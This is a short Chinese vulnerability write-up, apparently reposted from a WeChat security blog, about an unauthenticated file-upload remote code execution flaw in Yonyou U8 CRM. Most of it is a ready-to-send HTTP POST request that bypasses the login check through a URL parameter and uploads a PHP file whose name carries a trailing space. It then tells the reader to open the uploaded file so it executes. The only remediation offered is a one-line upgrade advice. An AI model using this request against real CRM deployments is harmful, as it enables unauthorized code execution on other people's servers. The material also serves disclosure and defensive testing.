声明
用友U8-CRM
0.0
漏洞描述
漏洞详情
漏洞URL:/ajax/uploadfile.php
漏洞参数:NULL
漏洞详情:
1、打开自己CRM系统
2、使用以下数据包进行验证
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: 127.0.0.1:8072
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64) Gecko/20162404 Firefox/108.0esr
Content-Length: 316
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding: gzip, deflate
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename="risk.php "
Content-Type: application/octet-stream
echo "risk";
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload"
upload
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
3、存在漏洞就会返回漏洞URL
4、访问返回的文件成功上传文件并执行
END
修复建议
升级到最新版本。
平安喜乐
END
原文始发于微信公众号(小羊安全屋):用友U8 CRM 文件上传RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论